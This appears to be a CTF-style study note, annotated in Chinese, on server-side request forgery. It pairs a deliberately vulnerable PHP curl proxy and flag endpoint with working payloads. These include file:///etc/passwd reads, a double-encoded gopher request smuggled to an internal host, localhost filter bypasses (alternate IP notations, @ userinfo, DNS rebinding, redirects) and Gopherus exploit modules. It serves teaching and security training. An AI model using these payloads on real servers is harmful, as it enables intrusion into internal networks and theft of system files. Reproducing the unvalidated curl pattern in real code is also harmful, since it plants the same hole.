
example

# index.php
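<?php
highlight_file(__FILE__);

/**
 * Fetch $url with cURL and echo the response body.
 *
 * Security note: $url arrives straight from the client ($_GET['url'] below)
 * with no scheme or host allow-list, so this function is the SSRF sink the
 * rest of the page exploits – file://, dict://, gopher:// and internal
 * addresses all reach cURL unchanged. It is deliberately left vulnerable
 * because the page documents this version; a real deployment would restrict
 * CURLOPT_PROTOCOLS and validate the resolved host.
 *
 * @param string $url fully attacker-controlled target URL
 */
function curl($url){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // The original passed an undefined $curlobj here, so RETURNTRANSFER was
    // never applied: curl_exec() printed the body itself and $result was
    // bool(true) (and on PHP 8 the null handle is a TypeError).
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    echo $result;
}

// No validation at all: the whole request target is chosen by the caller.
// '??' only avoids the "Undefined array key" warning when url is absent.
$url = $_GET['url'] ?? '';
curl($url);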
# ssrf.php
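<?php
// Flag endpoint guarded only by the source address of the request.
//
// Security note: REMOTE_ADDR === "127.0.0.1" is the whole trust boundary,
// and it is exactly what the SSRF in index.php defeats – a request relayed
// by cURL on the same host arrives from 127.0.0.1 and passes this check.
// Kept as the vulnerable version the page documents.
$ip = $_SERVER["REMOTE_ADDR"] ?? '';
if ($ip === "127.0.0.1") {
    // A missing parameter used to raise "Undefined array key"; '' fails the
    // strict comparison exactly as before. '===' rather than hash_equals()
    // so that a non-string value (passwd[]=x) still just yields "no".
    $passwd = $_GET["passwd"] ?? '';
    if ($passwd === "adminTrue") {
        readfile("/flag");
    } else {
        echo "no";
    }
} else {
    echo "not 127.0.0.1";
}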

payload

?url=http://127.0.0.1/ssrf.php?passwd=adminTrue
...

利用协议

file://
dict://
gopher://
ftp://
sftp://
ldap://
tftp://
...

file://

file://
file:///etc/passwd
file:///etc/hosts
file:///proc/net/arp
file:///proc/net/fib_trie
...

dict://

# 配合Capture探测存活主机和端口
dict://ip:port

http://

# 配合Capture扫目录
http://ip:<port>/<file>

gopher://

# 默认端口 70
gopher://ip:port/_gopher-text # _ 是填充位(可为任意字符),不会被接收

# gopher:// 由第一台服务器(index.php 里的 curl)解析, _ 后面的数据原样发给第二台服务器解析。
# 整个 payload 会被解码两次: PHP 填充 $_GET['url'] 时解一次, curl 构造 gopher 请求时再解一次, 所以需要双重 url 编码
gopher%3A%2F%2F172.250.250.4%3A80%2F_%2550%254f%2553%2554%2520%252f%256e%2561%256d%2565%252e%2570%2568%2570%253f%256e%2561%256d%2565%253d%2571%2571%2571%2520%2548%2554%2554%2550%252f%2531%252e%2531%250d%250a%2548%256f%2573%2574%253a%2520%2531%2537%2532%252e%2532%2535%2530%252e%2532%2535%2530%252e%2534%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%2554%2579%2570%2565%253a%2520%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2578%252d%2577%2577%2577%252d%2566%256f%2572%256d%252d%2575%2572%256c%2565%256e%2563%256f%2564%2565%2564%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%254c%2565%256e%2567%2574%2568%253a%2520%2531%2530%250d%250a%250d%250a%256e%2561%256d%2565%253d%256e%2532%2572%2579%2578

# _ 后的数据双重url解码

POST /name.php?name=qqq HTTP/1.1
Host: 172.250.250.4
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

name=n2ryx

Bypass

进制转换

# localhost 127.0.0.1
http://0x7F.0.0.1 //16进制
http://0177.0.0.1 //8进制
http://2130706433 //10进制整数格式
http://0x7F000001 //16进制整数格式
http://127.1 //省略模式
http://127.127.127.127 //127.0.0.0/8 整个网段都是回环地址, 只拦 127.0.0.1 的过滤可绕过
http://0 //特殊地址0
http://0.0.0.0
http://[::1] //ipv6回环地址
# 注意: 这些写法能否生效取决于发起请求的库(这里是 curl)如何解析主机, 过滤器(如 parse_url)与请求库解析不一致才是绕过的根源

302重定向

php -S 0.0.0.0:2222
服务下的index.php: <?php header('Location: http://127.0.0.1/flag.php');
# 注意: 只有目标设置了 CURLOPT_FOLLOWLOCATION 时 curl 才会跟随跳转; 上面给出的 index.php 没有设置该选项, 这种情况下 302 绕过无效

payload: url=http://构造重定向的ip:2222/

DNS重绑定

https://lock.cmpxchg8b.com/rebinder.html

http://example —> 127.0.0.1
# 原理: 过滤器第一次解析域名得到一个公网 IP 通过检查, curl 再次解析时得到 127.0.0.1。
# 只在"先校验域名解析结果、再单独发请求"的实现上有效, 且域名的 TTL 要足够小(0 或 1)

# @

http://www.baidu.com@www.qq.com  // @ 前是 userinfo(用户名)部分, 实际主机是 @ 后的 www.qq.com, 可绕过只检查 URL 开头/子串的过滤
http://www.baidu.com#www.qq.com // # 后是 fragment, 不会发送, 实则访问www.baidu.com

gopherus

Usage

Command Description
gopherus --help Help
gopherus --exploit Arguments can be :
--exploit mysql
--exploit postgresql
--exploit fastcgi
--exploit redis
--exploit zabbix
--exploit pymemcache
--exploit rbmemcache
--exploit phpmemcache
--exploit dmpmemcache
--exploit smtp

